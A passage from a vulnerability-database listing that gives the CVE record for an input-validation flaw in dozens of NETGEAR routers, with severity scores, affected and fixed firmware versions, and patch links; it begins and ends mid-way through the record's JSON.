href=\"https://www.netgear.com/support/product/rax41/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX42 (EoS)\u003c/b\u003e Nighthawk AX5 5-Stream AX4200 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax42/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX43 (EoS)\u003c/b\u003e Nighthawk AX5 5-Stream AX4200 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax43/\"\u003eV1.0.12.120\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX45 (EoS)\u003c/b\u003e Nighthawk AX6 6-Stream AX4300 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax45/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX48\u003c/b\u003e Nighthawk AX6 6-Stream AX5200 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax48/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX50\u003c/b\u003e Nighthawk AX6 6-Stream AX5400 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax50/\"\u003eV1.0.12.120\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX50S\u003c/b\u003e Nighthawk AX6 6-Stream AX5400 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax50s/\"\u003eV1.0.12.120\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAXE450\u003c/b\u003e Nighthawk AXE10000 Tri-Band WiFi 6E Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/raxe450/\"\u003eV1.0.10.86\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAXE500\u003c/b\u003e Nighthawk AX12 12-Stream AXE11000 Tri-Band WiFi 6E Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/raxe500/\"\u003eV1.0.10.86\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eXR1000\u003c/b\u003e Nighthawk WiFi 6 Pro Gaming Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/xr1000/\"\u003eV1.0.0.68\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003c/tbody\u003e\u003c/table\u003e\u003cp\u003eModels marked (EoS) have reached End-of-Support phase, and no security updates are planned. NETGEAR strongly recommends that you retire these devices and upgrade to a newer NETGEAR device for continued security support.\u003c/p\u003e"
}
],
"value": "Devices with automatic updates enabled may already have this patch applied. If not, please check the firmware version and update it to the latest. Fixed in:\n\nProductFixed VersionEX3700 AC750 WiFi Range Extender Essentials Edition V1.0.0.100 https://www.netgear.com/support/product/ex3700/ EX3800 (EoS) AC750 WiFi Range Extender Essentials Edition V1.0.0.100 https://www.netgear.com/support/product/ex3800/ EX6120 AC1200 Dual Band WiFi Range Extender V1.0.0.72 https://www.netgear.com/support/product/ex6120/ EX6130 AC1200 WiFi Range Extender V1.0.0.54 https://www.netgear.com/support/product/ex6130/ MR60 Nighthawk Mesh WiFi 6 Router V1.1.7.132 https://www.netgear.com/support/product/mr60/ MR70 Nighthawk Mesh WiFi 6 Router V1.0.3.28 https://www.netgear.com/support/product/mr70/ MR80 Nighthawk Tri-band Mesh WiFi 6 Router V1.1.7.14 https://www.netgear.com/support/product/mr80/ MS60 Nighthawk Mesh WiFi 6 Add-on Satellite V1.1.7.132 https://www.netgear.com/support/product/ms60/ MS70 Nighthawk Mesh WiFi 6 Add-on Satellite V1.0.3.28 https://www.netgear.com/support/product/ms70/ MS80 Nighthawk Tri-band Mesh WiFi 6 Add-on Satellite V1.1.7.14 https://www.netgear.com/support/product/ms80/ R6400v2 (EoS) AC1750 Smart WiFi Router 802.11ac Dual Band Gigabit V1.0.4.128 https://www.netgear.com/support/product/r6400v2/ R6700v3 (EoS) Nighthawk AC1750 Smart WiFi Dual Band Gigabit Router V1.0.4.128 https://www.netgear.com/support/product/r6700v3/ R6900P (EoS) Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router V1.3.3.152 https://www.netgear.com/support/product/r6900p/ R7000 (EoS) Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router V1.0.11.216 https://www.netgear.com/support/product/r7000/ R7000P (EoS) Nighthawk AC2300 Smart WiFi Dual Band Gigabit Router V1.3.3.152 https://www.netgear.com/support/product/r7000p/ R7960P (EoS) Nighthawk X6S AC3600 Tri-Band WiFi Router V1.4.4.92 https://www.netgear.com/support/product/r7960p/ R8000P (EoS) Nighthawk X6S AC4000 Tri Band WiFi Router V1.4.4.92 https://www.netgear.com/support/product/r8000p/ R8500 (EoS) Nighthawk X8 AC5300 Smart WiFi RouterEOSRAX20 (EoS) 4-Stream AX1800 WiFi 6 Router V1.0.18.144 https://www.netgear.com/support/product/rax20/ RAX35v2 Nighthawk AX4 4-Stream AX3000 WiFi 6 Router V1.0.12.118 https://www.netgear.com/support/product/rax35v2/ RAX40v2 Nighthawk AX4 4-Stream WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax40v2/ RAX41 (EoS) Nighthawk AX5 5-Stream AX3600 WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax41/ RAX42 (EoS) Nighthawk AX5 5-Stream AX4200 WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax42/ RAX43 (EoS) Nighthawk AX5 5-Stream AX4200 WiFi Router V1.0.12.120 https://www.netgear.com/support/product/rax43/ RAX45 (EoS) Nighthawk AX6 6-Stream AX4300 WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax45/ RAX48 Nighthawk AX6 6-Stream AX5200 WiFi 6 Router V1.0.12.118 https://www.netgear.com/support/product/rax48/ RAX50 Nighthawk AX6 6-Stream AX5400 WiFi 6 Router V1.0.12.120 https://www.netgear.com/support/product/rax50/ RAX50S Nighthawk AX6 6-Stream AX5400 WiFi 6 Router V1.0.12.120 https://www.netgear.com/support/product/rax50s/ RAXE450 Nighthawk AXE10000 Tri-Band WiFi 6E Router V1.0.10.86 https://www.netgear.com/support/product/raxe450/ RAXE500 Nighthawk AX12 12-Stream AXE11000 Tri-Band WiFi 6E Router V1.0.10.86 https://www.netgear.com/support/product/raxe500/ XR1000 Nighthawk WiFi 6 Pro Gaming Router V1.0.0.68 https://www.netgear.com/support/product/xr1000/ \n\nModels marked (EoS) have reached End-of-Support phase, and no security updates are planned. NETGEAR strongly recommends that you retire these devices and upgrade to a newer NETGEAR device for continued security support."
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Certain NETGEAR routers allow authenticated administrators to gain unintended control of the router",
"x_generator": {
"engine": "Vulnogram 1.0.3"
}
}
},
"cveMetadata": {
"assignerOrgId": "a2826606-91e7-4eb6-899e-8484bd4575d5",
"assignerShortName": "NETGEAR",
"cveId": "CVE-2026-9210",
"datePublished": "2026-06-09T15:50:48.947Z",
"dateReserved": "2026-05-21T17:29:00.866Z",
"dateUpdated": "2026-06-11T05:38:03.646Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-0417 (GCVE-0-2026-0417)
Vulnerability from nvd – Published: 2026-06-09 15:50 – Updated: 2026-06-10 15:49
VLAI
Title
Insufficient input validation in certain NETGEAR routers
Summary
Insufficient input validation vulnerability in the listed NETGEAR devices allows
authenticated administrators connected to the local network to tamper with
the router's integrity.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-20 - Improper input validation
Assigner
References
28 references
Impacted products
27 products
| Vendor | Product | Version | |
|---|---|---|---|
| NETGEAR | MR60 |
Affected:
0 , < V1.1.7.132
(custom)
|
|
| NETGEAR | MR70 |
Affected:
0 , < V1.0.3.28
(custom)
|
|
| NETGEAR | MR80 |
Affected:
0 , < V1.1.7.14
(custom)
|
|
| NETGEAR | MS60 |
Affected:
0 , < V1.1.7.132
(custom)
|
|
| NETGEAR | MS70 |
Affected:
0 , < V1.0.3.28
(custom)
|
|
| NETGEAR | MS80 |
Affected:
0 , < V1.1.7.14
(custom)
|
|
| NETGEAR | R6400v2 |
Affected:
0 , < V1.0.4.128
(custom)
|
|
| NETGEAR | R6700v3 |
Affected:
0 , < V1.0.4.128
(custom)
|
|
| NETGEAR | R6900P |
Affected:
0 , < V1.3.3.152
(custom)
|
|
| NETGEAR | R7000 |
Affected:
0 , < V1.0.11.216
(custom)
|
|
| NETGEAR | R7000P |
Affected:
0 , < V1.3.3.152
(custom)
|
|
| NETGEAR | R7960P |
Affected:
0 , < V1.4.4.92
(custom)
|
|
| NETGEAR | R8000P |
Affected:
0 , < V1.4.4.92
(custom)
|
|
| NETGEAR | R8500 |
Affected:
0 , ≤ 1.0.2.160
(custom)
|
|
| NETGEAR | RAX20 |
Affected:
0 , < V1.0.18.144
(custom)
|
|
| NETGEAR | RAX35v2 |
Affected:
0 , < V1.0.16.132
(custom)
|
|
| NETGEAR | RAX40v2 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX41 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX42 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX43 |
Affected:
0 , < V1.0.12.120
(custom)
|
|
| NETGEAR | RAX45 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX48 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX50 |
Affected:
0 , < V1.0.12.120
(custom)
|
|
| NETGEAR | RAX50S |
Affected:
0 , < V1.0.12.120
(custom)
|
|
| NETGEAR | RAXE450 |
Affected:
0 , < V1.0.10.86
(custom)
|
|
| NETGEAR | RAXE500 |
Affected:
0 , < V1.0.10.86
(custom)
|
|
| NETGEAR | XR1000 |
Affected:
0 , < V1.0.0.68
(custom)
|
Date Public
2026-06-09 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-0417",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-09T17:10:42.291794Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-09T17:10:51.031Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "MR60",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.132",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MR70",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.3.28",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MR80",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.14",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MS60",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.132",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MS70",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.3.28",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MS80",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.14",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R6400v2",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.4.128",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R6700v3",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.4.128",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R6900P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.3.3.152",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R7000",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.11.216",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R7000P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.3.3.152",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R7960P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.4.4.92",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R8000P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.4.4.92",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R8500",
"vendor": "NETGEAR",
"versions": [
{
"lessThanOrEqual": "1.0.2.160",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX20",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.18.144",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX35v2",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.16.132",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX40v2",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX41",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX42",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX43",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.120",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX45",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX48",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX50",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.120",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX50S",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.120",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAXE450",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.10.86",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAXE500",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.10.86",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "XR1000",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.0.68",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "pjqwudi"
}
],
"datePublic": "2026-06-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003eInsufficient input validation vulnerability in the listed NETGEAR\u0026nbsp;devices\u0026nbsp;allows\nauthenticated administrators connected to the local network to\u0026nbsp;tamper with\nthe router\u0027s integrity. \u003cbr\u003e\u003c/div\u003e\u003cdiv\u003e\u003cbr\u003e\u003c/div\u003e\u003cp\u003e\u003cbr\u003e\u003c/p\u003e"
}
],
"value": "Insufficient input validation vulnerability in the listed NETGEAR\u00a0devices\u00a0allows\nauthenticated administrators connected to the local network to\u00a0tamper with\nthe router\u0027s integrity."
}
],
"impacts": [
{
"capecId": "CAPEC-122",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-122 Privilege Abuse"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "ADJACENT",
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"exploitMaturity": "UNREPORTED",
"privilegesRequired": "HIGH",
"providerUrgency": "AMBER",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "DIFFUSE",
"vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/V:D/RE:L/U:Amber",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "LOW"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20 Improper input validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-10T15:49:33.259Z",
"orgId": "a2826606-91e7-4eb6-899e-8484bd4575d5",
"shortName": "NETGEAR"
},
"references": [
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/mr70/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/mr80/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/mr60/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ms60/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ms80/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r6400v2/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ms70/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r6700v3/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r7000/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r6900p/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r8000p/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r8500/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax40v2/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax42/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax35v2/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax41/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax20/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax43/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r7960p/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r7000p/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax45/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax48/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/raxe450/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax50s/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/xr1000/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax50/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/raxe500/"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://kb.netgear.com/000070811/June-2026-NETGEAR-Security-Advisory"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eDevices with automatic updates enabled may already have this patch applied. If not, please check the firmware version and update it to the latest. Fixed in:\u003c/p\u003e\u003ctable\u003e\u003cthead\u003e\u003ctr\u003e\u003cth\u003eProduct\u003c/th\u003e\u003cth\u003eFixed Version\u003c/th\u003e\u003c/tr\u003e\u003c/thead\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMR60\u003c/b\u003e Nighthawk Mesh WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/mr60/\"\u003eV1.1.7.132\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMR70\u003c/b\u003e Nighthawk Mesh WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/mr70/\"\u003eV1.0.3.28\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMR80\u003c/b\u003e Nighthawk Tri-band Mesh WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/mr80/\"\u003eV1.1.7.14\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMS60\u003c/b\u003e Nighthawk Mesh WiFi 6 Add-on Satellite\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ms60/\"\u003eV1.1.7.132\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMS70\u003c/b\u003e Nighthawk Mesh WiFi 6 Add-on Satellite\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ms70/\"\u003eV1.0.3.28\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMS80\u003c/b\u003e Nighthawk Tri-band Mesh WiFi 6 Add-on Satellite\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ms80/\"\u003eV1.1.7.14\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR6400v2 (EoS)\u003c/b\u003e AC1750 Smart WiFi Router 802.11ac Dual Band Gigabit\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r6400v2/\"\u003eV1.0.4.128\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR6700v3 (EoS)\u003c/b\u003e Nighthawk AC1750 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r6700v3/\"\u003eV1.0.4.128\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR6900P (EoS)\u003c/b\u003e Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r6900p/\"\u003eV1.3.3.152\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR7000 (EoS)\u003c/b\u003e Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r7000/\"\u003eV1.0.11.216\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR7000P (EoS)\u003c/b\u003e Nighthawk AC2300 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r7000p/\"\u003eV1.3.3.152\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR7960P (EoS)\u003c/b\u003e Nighthawk X6S AC3600 Tri-Band WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r7960p/\"\u003eV1.4.4.92\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR8000P (EoS)\u003c/b\u003e Nighthawk X6S AC4000 Tri Band WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r8000p/\"\u003eV1.4.4.92\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR8500 (EoS)\u003c/b\u003e Nighthawk X8 AC5300 Smart WiFi Router\u003c/td\u003e\u003ctd\u003eEOS\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX20 (EoS)\u003c/b\u003e 4-Stream AX1800 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax20/\"\u003eV1.0.18.144\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX35v2\u003c/b\u003e Nighthawk AX4 4-Stream AX3000 WiFi 6 Router\u003c/td\u003e\u003ctd\u003eV1.0.16.132\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX40v2\u003c/b\u003e Nighthawk AX4 4-Stream WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax40v2/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX41 (EoS)\u003c/b\u003e Nighthawk AX5 5-Stream AX3600 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax41/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX42 (EoS)\u003c/b\u003e Nighthawk AX5 5-Stream AX4200 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax42/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX43 (EoS)\u003c/b\u003e Nighthawk AX5 5-Stream AX4200 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax43/\"\u003eV1.0.12.120\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX45 (EoS)\u003c/b\u003e Nighthawk AX6 6-Stream AX4300 WiFi Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax45/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX48\u003c/b\u003e Nighthawk AX6 6-Stream AX5200 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax48/\"\u003eV1.0.12.118\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX50\u003c/b\u003e Nighthawk AX6 6-Stream AX5400 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax50/\"\u003eV1.0.12.120\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAX50S\u003c/b\u003e Nighthawk AX6 6-Stream AX5400 WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/rax50s/\"\u003eV1.0.12.120\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eRAXE450\u003c/b\u003e Nighthawk AXE10000 Tri-Band WiFi 6E Router\u003c/td\u003e\u003ctd\u003e\u003ca 